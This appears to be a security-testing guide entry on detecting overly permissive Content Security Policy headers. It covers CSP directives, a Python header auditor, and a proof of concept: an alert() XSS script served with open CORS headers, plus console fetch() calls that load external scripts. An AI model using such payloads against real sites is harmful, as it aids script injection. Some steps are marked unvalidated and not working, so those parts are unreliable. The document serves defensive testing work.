Test for overly permissive Content Security Policy (CSP).
Vulnerability description for reporting available in VulnDB (GitHub)
Examples
In HTTP response headers, the content security policy header should be checked to validate that it is not too permissive.
CSP can be delivered to the user agent by several techniques:
- Content-Security-Policy HTTP response header field. This is the preferred technique.
- <meta> HTML element with the http-equiv attribute set to Content-Security-Policy. These elements need to be placed as early as possible in the document.
- Content-Security-Policy-Report-Only HTTP response header field. This header is used when the developer is unsure of the CSP behavior and wants to monitor it instead of enforcing it.
Fetch directives are used to specify a particular category of resource that a document is allowed to load (JavaScript, CSS stylesheets, images, fonts, etc.).
script-src
Only allow scripts to be loaded from the same origin (URI scheme like HTTP + domain + port) as the page itself:
script-src 'self'
Only allow scripts to be loaded from specific domains:
script-src https://scripts.normal-website.com
img-src
Only allow images to be loaded from the same origin (URI scheme like HTTP + domain + port) as the page itself:
img-src 'self'
frame-ancestors
“frame-src” allows you to specify where iframes in a page may be loaded from. This differs from “frame-ancestors”, which allows you to specify which parent sources may embed a page.
Only allow the page to be framed by other pages from the same origin:
frame-ancestors 'self'
Only allow the page to be framed by the same origin and by specific domains (a wildcard subdomain is allowed):
frame-ancestors 'self' https://normal-website.com https://*.robust-website.com
No framing allowed at all:
frame-ancestors 'none'
default-src
Fallback for the other CSP fetch directives when they are absent:
child-src, connect-src, font-src, frame-src, img-src, manifest-src, media-src, object-src, prefetch-src, script-src, script-src-elem, script-src-attr, style-src, style-src-elem, style-src-attr, worker-src
default-src 'self';
Lock down all resource loading and then add further directives to open up the policy:
default-src 'none';
connect-src
Restricts the URLs which can be loaded using script interfaces. The following APIs are controlled by this directive: the ping attribute in “<a>” elements, fetch(), fetchLater(), XMLHttpRequest, WebSocket, EventSource, Navigator.sendBeacon()
connect-src https://example.com/
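As an added example (not code from the original page), a small Python checker that applies the default-src fallback described above, treats frame-ancestors as a directive that does not fall back, and flags the permissive source expressions a tester looks for; the WEAK_SOURCES set and the choice of audited directives are my own assumptions.

```python
# Directives that fall back to default-src when absent (the list above).
FETCH_DIRECTIVES = {
    "child-src", "connect-src", "font-src", "frame-src", "img-src",
    "manifest-src", "media-src", "object-src", "prefetch-src", "script-src",
    "script-src-elem", "script-src-attr", "style-src", "style-src-elem",
    "style-src-attr", "worker-src",
}
# Source expressions that leave a directive effectively open (assumed list).
WEAK_SOURCES = {"*", "'unsafe-inline'", "'unsafe-eval'", "data:", "http:", "https:", "blob:"}


def parse_csp(header):
    """Split a CSP value into {directive: [sources]}; names are case-insensitive
    and, as in browsers, only the first occurrence of a directive counts."""
    policy = {}
    for token in header.split(";"):
        parts = token.strip().split()
        if parts:
            policy.setdefault(parts[0].lower(), parts[1:])
    return policy


def effective_sources(policy, directive):
    """Resolve a directive, applying the default-src fallback for fetch
    directives only. Returns None when nothing restricts it at all."""
    if directive in policy:
        return policy[directive]
    if directive in FETCH_DIRECTIVES:
        return policy.get("default-src")
    return None


def audit_csp(header):
    """Return findings that make the policy overly permissive."""
    policy = parse_csp(header)
    findings = []
    for directive in ("script-src", "connect-src", "object-src", "frame-ancestors"):
        sources = effective_sources(policy, directive)
        if sources is None:
            findings.append(f"{directive}: unrestricted (directive absent)")
            continue
        # CSP3: when a nonce or hash is present, 'unsafe-inline' is ignored.
        has_nonce_or_hash = any(s.lower().startswith(("'nonce-", "'sha")) for s in sources)
        for src in sources:
            low = src.lower()
            if low == "'unsafe-inline'" and has_nonce_or_hash:
                continue
            if low in WEAK_SOURCES or low.startswith("http://"):
                findings.append(f"{directive}: permissive source {src}")
    return findings
```

Feed it the raw header value captured in the proxy; an empty list means none of the audited directives is open.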
Testing

See the OWASP Testing Guide on WSTG-CONF-12.
Using the Burp Suite tool, intercept requests while visiting the website. The Content-Security-Policy HTTP header is not set in the server response.
- Open a browser (Chrome was used) and visit the website.
- Open the developer tools (Inspector) and go to the Console tab. The following command demonstrates the ability to reach out to an untrusted domain.
fetch('https://loremflickr.com/320/240/alpaca')
PoC
Create the file csp_poc.php:
<?php
// Served as JavaScript with permissive CORS headers so any origin can load it.
header("Content-Type: application/javascript");
header("Access-Control-Allow-Origin: *");
header("Access-Control-Allow-Headers: access");
header("Access-Control-Allow-Methods: GET, POST, PUT, OPTIONS");
header("Access-Control-Allow-Credentials: true");
?>
alert("jQuery XSS POC for: " + document.domain);
Start an HTTP server from the website directory (note: Python's http.server serves files statically and does not execute PHP, so csp_poc.php is returned verbatim unless a PHP-capable server is used):
cd <website directory>
# Python 2.7
python -m SimpleHTTPServer 80
# Python 3.x (port 8081 to match the PoC URLs below)
python -m http.server 8081
# Windows
C:\Python27\python.exe -m SimpleHTTPServer 8081
Visit the vulnerable website (the one with the overly permissive CSP).
Open the web console – TO BE VALIDATED, NOT WORKING YET
$.get('http://127.0.0.1:8081/csp_poc.php')
Chrome & Firefox console – TO BE VALIDATED, NOT WORKING YET
fetch('http://127.0.0.1:8081/csp_poc.php')
Works in Chrome (returns PromiseState: fulfilled)
fetch('https://dummyimage.com/100/ff6666&text=CSP')
fetch('https://gist.github.com/modalsoul/3868393.js')
Not vulnerable if the console shows a message such as:
Access to fetch at 'http://127.0.0.1:8081/csp_poc.php' from origin '<vulnerable url>' has been blocked by CORS policy...
Cross-Origin Request Blocked
A request refused by CSP itself is reported differently (Chrome: "Refused to connect to '...' because it violates the following Content Security Policy directive: ..."), whereas a CORS error means the browser sent the request and only refused to expose the response to the page.
The command demonstrates the ability to reach out to an untrusted domain to execute a malicious script.
Reference
- CSP: script-src (Mozilla)
- OWASP CSP Cheat Sheet (OWASP)
- Content Security Policy (CSP) Bypass (HackTricks)
- CSP bypass: self + 'unsafe-inline' with Iframes (HackTricks)